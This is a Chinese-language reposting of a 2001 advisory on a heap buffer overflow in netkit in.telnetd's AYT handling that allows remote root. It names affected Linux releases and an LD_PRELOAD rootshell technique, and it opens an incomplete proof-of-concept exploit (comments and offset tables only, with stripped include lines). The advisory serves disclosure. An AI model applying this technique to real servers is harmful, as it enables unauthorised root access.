Linux netkit in.telnetd远程溢出漏洞

2008-04-09 04:30:32来源：互联网 阅读 ()

Linux netkit in.telnetd远程溢出漏洞

发布日期：2001-08-10

更新日期：2001-08-10

受影响系统：netkit-telnet-0.17以及更低版本

- Red Hat Linux 5.2

- Red Hat Linux 6.2

- Red Hat Linux 7.0

- Red Hat Linux 7.1

- Debian Linux 2.2 alias potato描述：

scut@nb.in-berlin.de发现很多操作系统的telnetd存在AYT缓冲区溢出

漏洞。参见: http://security.nsfocus.com/showQuery.asp?bugID=1657

在他的公告中描述 Linux netkit-telnetd >= 0.14 是不受此问题影响的。但是最新的报

告显示，Linux netkit-telnetd <= 0.17版本都是受影响的。问题同样出在处理telnet协

议选项的函数中没有进行有效的边界检查，当使用某些选项('AYT')时，可能发生缓冲区

溢出。

在Linux系统下，如果用户可以获取对系统的本地访问权限，它可以通过telnetd的漏洞为

/bin/login设置环境变量，例如

LD_PRELOAD=/tmp/make-rootshell.so

如果用户没有本地访问权限，他可以覆盖一些块(chunk)结果，setenv(3)会使用这些

结构，并在用户可以控制的内存取中一个新的chunk，因此当环境变量重新分配内存时会

改变任意内存地址的值。

攻击者可能远程获取root权限。

测试方法：警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

zen-parse (zen-parse@gmx.net)提供了如下测试代码：

#include

#include

#include

#include

#include

#include

#include

/*********************************************************************

Proof of concept netkit-0.17-7 local root exploit.

Exploits buffer overflow in the AYT handling of in.telnetd,

due to bad logic in the handling of snprintf(), and

TESO advisory details were enough to allow me to put

controlable addresses in arbitary heap locations.

Heap based exploit. Overflow allows rewriting of some heap

data, which allowed me to put a new heap structure in the

input buffer, which let me do whatever I want.

'traceroute exploit story - By Dvorak, Synnergy Networks' was very

helpful. Also malloc.c was good.

*********************************************************************/

/*

Notes about exploit

1) RedHat 7.0, exploiting localhost

2) hostname is clarity.local

3) It probably won't work without at least a different setting for

the --size option, and probably the --name option as well. The

--name arguemnt is the hostname part of the string that gets

returned by the AYT command, which may be different to the name

of the address you are connecting to..

4) There are a lot of things that use the heap, making the size

depend on alot of factors.

5) You will might need to change some (or all) of the offsets.

This program does allow you to brute force, if the hostname returned

by the AYT command is not a multiple of 3 letters long.

It is also possibly (at least according to some quick testing I did)

exploitable on some (all?) servers with names that are multiples of three

letters long, using the Abort Output command to add 2 characters to the

output length, and exploit the heap in a similar manner to this method.

(You can only directly put user controlable characters in 2 out of 3

locations (ie: no AO will give you a multiple of 3 bytes on the heap, AO

will give you 2 more than a multiple of 3 bytes) with controllable

characters, but when you count the null added by the netoprintf(), and use

0 as an option to a do or will, you can sometimes create valid chunks that

point to locations you can control. I have only tested this method with a

simulation, but it seems it would probably work with the telnetd as well.

I will look into it when I have time. Maybe.)

. . _ _ _ _ . . _ _ _ . .

|_ _|_ _|_ _ . / / |\/| |_| _| | | ||\/| / | | ||_ | |

| | | | |_|. / / | | | _|.|_ |_|| | / |_ |_| _| \/

|

*********************************************************************/

#define SERVER_PORT 23

#define ENV 18628

int offset12[] = {

// netibuf[343]->the chunk start.

-4, 0xaa,

-5, 0xbb,

-6, 0xcc,

-7, 0x10,

-9, 0xdd,

-10, 0x68,

-12, 0xee,

-13, 0x88,

-14, 0x99,

0, 0x00

};

int offset3[]={

-1,0x00,

0,0

};

int *offsets=offset12;

int dalen = 0;

int big;

int small;

int mipl = 0;

int ninbufoffset;

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com

特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有

相关文章